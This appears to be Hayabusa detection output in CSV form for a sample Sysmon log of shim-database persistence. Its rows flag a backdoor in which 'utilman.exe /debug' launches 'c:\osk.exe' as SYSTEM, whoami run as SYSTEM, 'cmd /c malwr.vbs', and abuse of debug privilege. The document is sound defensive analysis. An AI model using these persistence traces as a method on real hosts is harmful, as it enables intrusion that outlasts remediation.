Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.044 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.044 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.054 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.054 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:28.214 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:28.294 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe 
ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:28.304 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:28.815 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:31.860 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:31.860 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: 
C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:35.745 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 
+00:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:00:01.518 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:00:01.539 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:10:34.489 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:18:54.257 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 
365ABB72-5CBE-5C91-0000-001017150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:18:57.202 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:20:32.298 +00:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_sysmon/registry_set/registry_set_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:20:32.298 +00:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_sysmon/registry_set/registry_set_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:21:05.306 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:22:28.886 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: 
C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:22:33.593 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:26:05.397 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:26:08.852 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:31:05.509 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: 
EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:36:05.610 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:05.702 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:11.440 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:17.339 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 
365ABB72-61FD-5C91-0000-0010536A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:17.339 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:18.290 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:18.410 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:49.576 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
+2019-03-19 23:18:49.856 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.157 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.217 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.217 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off 
MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.387 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.427 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.467 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.497 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 
365ABB72-777F-5C91-0000-0010EA5B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:51.308 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:51.599 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:51.679 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:51.789 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 
365ABB72-7781-5C91-0000-001036CB0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.111 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.501 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.571 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.922 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.922 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.102 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.172 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.172 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.172 +00:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.172 +00:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent 
